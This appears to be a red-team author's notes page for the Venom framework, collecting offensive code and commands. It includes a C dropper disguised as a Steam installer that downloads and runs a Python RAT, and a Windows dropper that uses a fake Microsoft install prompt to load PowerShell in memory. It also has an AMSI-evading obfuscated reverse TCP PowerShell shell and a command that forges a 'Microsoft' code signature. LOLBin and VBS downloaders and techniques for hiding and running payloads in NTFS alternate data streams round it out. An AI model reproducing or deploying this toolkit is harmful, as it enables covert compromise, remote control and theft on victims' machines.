meterpeter updates

meterpeter.ps1

meterpeter new updates

venom v1.0.17 - shinigami

• venom => categorie nº3 => agent nº5 (SillyRAT)
  • Target system: Linux distros
  • Dropper.c file before being compiled into an Linux standalone executable

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<unistd.h>

/*
Author: r00t-3xp10it [SSA RedTeam @2020]
Framework: Venom v1.0.17 - Multi-OS - Agent nº 5
Function: Install python3 SillyRAT requirements before downloading and executing
Steam.py (Client reverse tcp python shell) detach from parent (dropper) process.
Mandatory dependencies: python3 and pip3 {tabulate pynput psutil pillow pyscreenshot pyinstaller}
*/

int main()
{
   /*
   This fork(); function allow us to spawn a new child process (in background). This way i can
   execute Client.py in background while continue the execution of the C program in foreground.
   Article: https://www.geeksforgeeks.org/zombie-and-orphan-processes-in-c
   */
   fflush(NULL);
   int pid = fork();
      if (pid > 0) {
         /*
         We are runing in parent process (child its also running)
         Function: Install python3 and sillyrat requirements
         */
         printf("\nSteam - 3.10.5 Linux Installer\n");
         printf("----------------------------------------------------\n");
         /* Display system information onscreen to target user */
         sleep(1);system("c=$(hostnamectl);echo \"$c\"");
         printf("----------------------------------------------------\n");

            /* Install python3 and SillyRAT requirements */
            sleep(1);system("sudo apt-get update && apt-get install -y python3 && pip3 install tabulate pynput psutil pillow pyscreenshot pyinstaller");
            printf("Done.. ALL Steam requirements are satisfied.\n");

      }
      else if (pid == 0) {
         /*
         We are running in child process (as backgrond job - orphan).
         setsid(); allow us to detach the child (Client) from parent (dropper) process,
         allowing us to continue running the Client.py in ram even if parent process its terminated.
         */
         setsid();
         sleep(3);system("cd /tmp && sudo /usr/bin/wget -qq http://192.168.1.73/Steam.py -O /tmp/Steam.py && python3 Steam.py");
      } return 0;
}

Dropper.c

• Compile this template to EXE (mingw32)
  • LolBin: new-object -com WinHttp.WinHttpRequest.5.1

/*
Author: r00t-3xp10it (SSA RedTeam @2020)
Framework: Venom v1.0.17 - Amsi Evasion - Agent nº 7
Function: This template its used to download the Client.ps1 from attacker
machine (LAN) and execute it on target RAM (fileless - payload does not touch disk)
*/

#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>

int main()
{
 /* PS MsgBox for target user reading (Social Engineering) */
  system("powershell (New-Object -ComObject Wscript.Shell).Popup(\"\"\"Install Microsoft Application ?\"\"\",4,\"\"\"$Drop - 3.10.5-dev Windows Installer\"\"\",1+64)")

 /* Remotelly download Client.ps1 and execute it on Target RAM */
  system("powershell $MyCat=("{2}{0}{1}" -f'o','xy','$pr');$Token=("{1}{0}{2}" -f'pa','by','ss');powershell -exec $Token -w 1 -C $MyCat=New-Object -Com WinHttp.WinHttpRequest.5.1;$MyCat.open('GET','http://$lhost/$Drop.ps1',`$false);$MyCat.send();& ('i'+'ex') $MyCat.responseText;");
 return 0;
}

Sign standalone executable (SSL)

• Ask user to enter SSL password to be used

openssl req -x509 -newkey rsa:4096 -keyout output/key.pem -out output/cert.pem -days 365
osslsigncode sign -certs "output/cert.pem" -pass "toor" -key "output/key.pem" -n "Microsoft" -i "https://www.Microsoft.com" -t "http://timestamp.comodoca.com/authenticode" -in "output/evil_x86.exe" -out "output/signed_x86.exe"

OR:

• i can use the reverse technic to deliver the URL insted of one dropper
  • But this onelinner technic its suspicious to target execute it ..
    

Reverse tcp ps shell

• With localhost ip adress obfuscation (hex)

## Build Reverse TCP Powershell Shell (hex obfuscated).
echo "${BlueF}[☠]${white} Writting Reverse Powershell Shell to output ..";sleep 2

<#
Obfuscated (hex) Reverse Powershell Shell
Framework: venom v1.0.17 (amsi evasion)
#>

while ($true) {
   $gui = "PCli";
   $func = "ent";
   $bin = "ets.TC";
   $auto = ".Net.Sock";
   $Cache = "System";
   $px = $hexed;

      $p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';
      $w = "GET /index.html HTTP/1.1\`r\`nHost: $p\`r\`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\`r\`nAccept: text/html\`r\`n\`r\`n\";
      $s = [System.Text.ASCIIEncoding];[byte[]]\$b = 0..65535|%{0};$x = "n-eiorvsxpk5";

      Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);
      $y = New-Object $Cache$auto$bin$gui$func($p,$lport);
      $z = $y.GetStream();
      $d = $s::UTF8.GetBytes($w);
      $z.Write($d, 0, $d.Length);
      $t = (n-eiorvsxpk5 whoami) + "> ";

   while(($l = $z.Read($b, 0, $b.Length)) -ne 0) {
      $v = (New-Object -TypeName $s).GetString($b,0, $l);
      $d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);
      $z.Write($d, 0, $d.Length);
   }
   $y.Close();
   Start-Sleep -Seconds 3
}

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

Another example

$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"

amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660

not detected (windows defender)

server: https://raw.githubusercontent.com/federicochieregato/DarkFox/master/server.py
Client: https://github.com/federicochieregato/DarkFox/blob/master/client.py

darkarmor: https://blog.dylan.codes/bypassing-av-via/

use winHTTPRequest with this ? => https://github.com/r00t-3xp10it/venom/tree/master/templates/hta_attack

onelinner download

bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png

start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL

Download with VBS api

• dropper.vbs (replace Objshell.Run API flagged by AV)

CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')" 
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"

Alternate data streams (ADS)

What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac which uses something called resource forks.

Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.


How to see Alternate Data Streams records in CLI?

dir /r

---

Proof-Of-Concept

• Create one text file to be embebbed with one jpg image

echo test if it works > SSAredTeam.txt

• Download kali-linux.jpg
  

• Append the image file to the text file

type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg

• Delete kali-linux.jpg image

del kali-linux.jpg

• see ads

dir /r

• Execute kali-linux.jpg image

mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg

hidde mp3 in text file

• Create one text file to be embebbed with one mp3 file

echo test if it works > SSAredTeam.txt

• Append the mp3 file to the text file

type mysong.mp3 > SSAredTeam.txt:mysong.mp3

• Delete mysong mp3

del mysong.mp3

• see ads

dir /r

• Execute mysong.mp3 (ads)

wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3

hidde exe in text file

• Create one text file to be embebbed with one exe file

echo test if it works > SSAredTeam.txt

• Append the exe file to the text file

type payload.exe > SSAredTeam.txt:payload.exe

• Delete payload exe

del payload.exe

• see ads

dir /r

• Execute payload.exe (ads)

wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"

---

• Execute payload.bat stored in an Alternate Data Stream (ADS).

cmd.exe - < SSAredTeam.txt:payload.bat

• Execute payload.ps1 stored in an Alternate Data Stream (ADS).

powershell .\SSAredTeam.txt:payload.ps1

Download files using VBS

' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0    'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"